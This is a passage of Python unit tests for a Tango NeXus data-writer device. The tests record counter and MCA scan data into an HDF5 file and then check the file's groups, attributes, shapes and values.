self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
# ???
# self.assertEqual(cnt.name,"cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecord(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
# self.assertEqual(f.path, fname)
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
# ???????
# ! PNI self.assertEqual(mca.name, "mca")
# ????
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecord_skipacq(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.myAssertRaise(Exception, dp.openEntry)
self.assertEqual(dp.state(), PyTango.DevState.FAULT)
dp.OpenFile()
dp.skipacquisition = True
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.skipacquisition = True
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.skipacquisition = True
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.skipacquisition, False)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
# self.assertEqual(f.path, fname)
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
